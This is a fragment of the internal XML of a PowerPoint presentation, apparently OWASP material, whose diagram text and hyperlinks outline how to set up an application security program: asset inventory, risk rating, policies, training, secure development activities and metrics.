        </pc:graphicFrame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hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/data2.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/drawing1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_2" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Code_Review_-_1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_1" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Design_Review_-_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_3" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_1" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Policy_&amp;_Compliance_-_2" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Threat_Assessment_-_1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Education_&amp;_Guidance_-_3" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Verification" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Strategy_&amp;_Metrics_-_2" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Construction" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SAMM_-_Security_Testing_-_1"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www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="Externa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r>
            <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Get Started</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A201932A-BA50-4861-8522-7F31487BAA62}" type="parTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" type="sibTrans" cxnId="{552BEC9E-B5F4-450A-887F-2537B364E7E3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US" sz="1000"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCC482EA-6C38-44EB-ABEC-842881B2C10F}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="422275" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="95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Document all applications and associated data assets. Larger organizations should consider implementing a Configuration Management Database (CMDB) for this purpose</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950" kern="1200" noProof="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endParaRPr>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r>
            <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Risk Based Portfolio Approach</a:t>
          </a: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F576BD5F-AD4E-429F-935A-1A67C630AE0F}">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Identify </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="95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protection needs</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noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>of your </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="95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application portfolio</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950" noProof="0" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> from a business perspective.</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This should be driven in part by privacy laws and other regulations relevant to the data asset being protected. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="95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EE435F92-04EC-45B6-94A8-51EF1EBF242B}" type="parTrans" cxnId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EBA831D-0061-461C-A1EF-795466184E12}" type="sibTrans" cxnId="{9A63BADE-E25A-48FB-9671-EE7EAB6807F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDF0D463-07CB-4904-B045-2FC63D99B581}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Enable with a Strong Foundation</a:t>
          </a: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Establish a set of focused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2"/>
            </a:rPr>
            <a:t>policies and standards</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that provide an application security baseline for all development teams to adhere to.</a:t>
          </a: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FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}">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Define a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3"/>
            </a:rPr>
            <a:t>common set of reusable security controls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that complement these policies and standards and provide design and development guidance on their use.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0A67A6BB-3147-45FF-9B2C-B44B543F5A2A}" type="parTrans" cxnId="{9CB74495-237D-4F40-98F9-915162C6F1AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ECD43AAD-CCE0-45CE-8EFA-57AC257C5615}" type="sibTrans" cxnId="{9CB74495-237D-4F40-98F9-915162C6F1AD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{024BBBE2-0706-4354-8AB0-3262009E8862}">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Establish an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application security training curriculum</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that is required and targeted to different</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="950" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="en-US" sz="950" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>development roles and topics.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8AF02AF4-6088-4389-900C-B1A6C7B52EA4}" type="parTrans" cxnId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C468EA37-5762-4D06-A4F9-E930ECF24341}" type="sibTrans" cxnId="{3AF172E9-5C4E-4B5A-8CB8-8FFF05450408}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="en-US" sz="1050" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Integrate Security into Existing Processes</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BC25BDC-3278-4082-B675-15E8A5144241}" type="parTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" type="sibTrans" cxnId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{39E7FF2B-BF9A-4849-B74B-F0434B480B07}">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Define and integrate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5"/>
            </a:rPr>
            <a:t>secure implementation</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and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6"/>
            </a:rPr>
            <a:t>verification</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activities into existing development and operational processes. Activities include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7"/>
            </a:rPr>
            <a:t>threat modeling</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secure design and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8"/>
            </a:rPr>
            <a:t>design review</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secure coding and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9"/>
            </a:rPr>
            <a:t>code review</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0"/>
            </a:rPr>
            <a:t>penetration testing</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and remediation.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C24D1CFC-B59D-48F6-8B6A-AD23468C518D}" type="parTrans" cxnId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A2F85221-5EC1-4B22-9833-6E3F4447E6C8}" type="sibTrans" cxnId="{27C6B4EA-C9F4-486C-848E-B16B069FBF21}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{085D3A5B-E8C3-4ABB-9F97-7914BC595087}">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Provide subject matter experts and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1"/>
            </a:rPr>
            <a:t>support services for development and project teams</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to be successful.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D596540A-BB15-4E6E-8AD1-6C9E49AFC4B6}" type="parTrans" cxnId="{037BDB8F-830F-44B2-9861-7E6A03948B87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D74C2B73-3ED0-4D65-BFF8-1F8F86CFC71F}" type="sibTrans" cxnId="{037BDB8F-830F-44B2-9861-7E6A03948B87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C40210B5-480D-4766-978A-36F3F23CB9B8}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:endParaRPr lang="en-US" sz="1050" b="1"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FBE90CC-07EB-498E-9CCD-E2662DC23296}" type="parTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A003834B-8490-4CC6-B531-19539D19FBD4}" type="sibTrans" cxnId="{2A7D16BC-68AB-49CE-A706-158D1616BC34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}">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Manage with metrics. Drive improvement and funding decisions based on the metrics and analysis data captured. Metrics include adherence to security practices and activities, vulnerabilities introduced, vulnerabilities mitigated, application coverage, defect density by type and instance counts, etc.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{730D1E5B-ACEC-4A48-BF36-5E6B1CC715C0}" type="parTrans" cxnId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDDED477-A083-4E27-87C4-9B144EEE4A9C}" type="sibTrans" cxnId="{9D333BDE-D77C-439D-8C45-B3C54C67AE87}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8BC7F1A-0E3C-445E-9575-4512324EDAC9}">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Analyze data from the implementation and verification activities to look for root cause and vulnerability patterns to drive strategic and systemic improvements across the enterprise.</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="950" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:b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Learn from mistakes and offer positive incentives to promote improvements.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F2853B7C-C640-407B-AE16-3B6A7DC44BF1}" type="parTrans" cxnId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BC7E3830-1E0B-47C9-BCFB-30E22DBC39D8}" type="sibTrans" cxnId="{99A0BECD-C0EB-442E-A14E-115C6C2004C6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0945CDD4-9E6A-4629-B151-EFF4819549CB}">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Conduct a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2"/>
            </a:rPr>
            <a:t>capability gap analysis comparing your organization to your peers</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to define key</a:t>
          </a:r>
          <a:b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b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improvement areas and an execution plan. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4A0BC050-CE9B-4496-A285-A9644C15A612}" type="parTrans" cxnId="{26ABB8A4-2126-4601-8276-CB099BFB0770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DB92B70E-00E3-4B8F-87A9-124474721CDF}" type="sibTrans" cxnId="{26ABB8A4-2126-4601-8276-CB099BFB0770}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29D76988-94EC-456A-9326-82A5AA778D9E}">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Gain management approval and establish an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3"/>
            </a:rPr>
            <a:t>application security awareness campaign</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for the entire IT organization.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" type="parTrans" cxnId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{41E4CEE4-E668-414D-904A-3A62818B4066}" type="sibTrans" cxnId="{A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F07B8E8B-96F5-4983-82B3-83A75552F3EA}">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Establish assurance guidelines to properly define coverage and level of rigor required.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C4C6F51-54CF-4E1D-9FB8-75AB7DC25781}" type="parTrans" cxnId="{469E487E-F0E4-4400-AA39-3813DAC2D493}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{34F33D30-9604-4CC9-AB5D-13D7672AE842}" type="sibTrans" cxnId="{469E487E-F0E4-4400-AA39-3813DAC2D493}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{146439ED-B762-48F0-BE3C-0D5D54E004EE}">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Accordingly measure and prioritize all your applications and APIs. Add the results to your CMDB. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="95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3CC2D3CB-0577-4993-B0AC-DC07BE08082D}" type="parTrans" cxnId="{426CC4D4-D837-4BC5-ADA7-F0083D714E3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{15CFE006-FE0E-488C-A6B9-019206FFB0D8}" type="sibTrans" cxnId="{426CC4D4-D837-4BC5-ADA7-F0083D714E3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABA88485-4799-4A3E-A395-465F2466FC90}">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Establish a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4"/>
            </a:rPr>
            <a:t>common risk rating model</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with a consistent set of likelihood and impact factors reflective of your organization's tolerance for risk. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="95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69D2C3E2-C6D1-4586-8000-17E989285CF4}" type="parTrans" cxnId="{BEC458BC-FBE4-4D00-9454-1E14F4CB9C2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4B40327-8B99-4AA2-82D9-D2FD89917F3B}" type="sibTrans" cxnId="{BEC458BC-FBE4-4D00-9454-1E14F4CB9C2D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="de-DE"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{84E62741-DE92-5D48-8E11-F5450775D2EB}">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Establish an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5"/>
            </a:rPr>
            <a:t>application security program</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and drive adoption. </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5330F5FD-52B0-144C-814A-D62027712440}" type="parTrans" cxnId="{AFB279A7-B036-2C4F-8DD8-37D715363A86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C02DB81-333D-C748-8AF4-65359B719E74}" type="sibTrans" cxnId="{AFB279A7-B036-2C4F-8DD8-37D715363A86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" type="pres">
      <dgm:prSet presAssocID="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>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5" custScaleX="30117" custScaleY="89341">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="5" custScaleY="104600">
        <dgm:presLayoutVars>
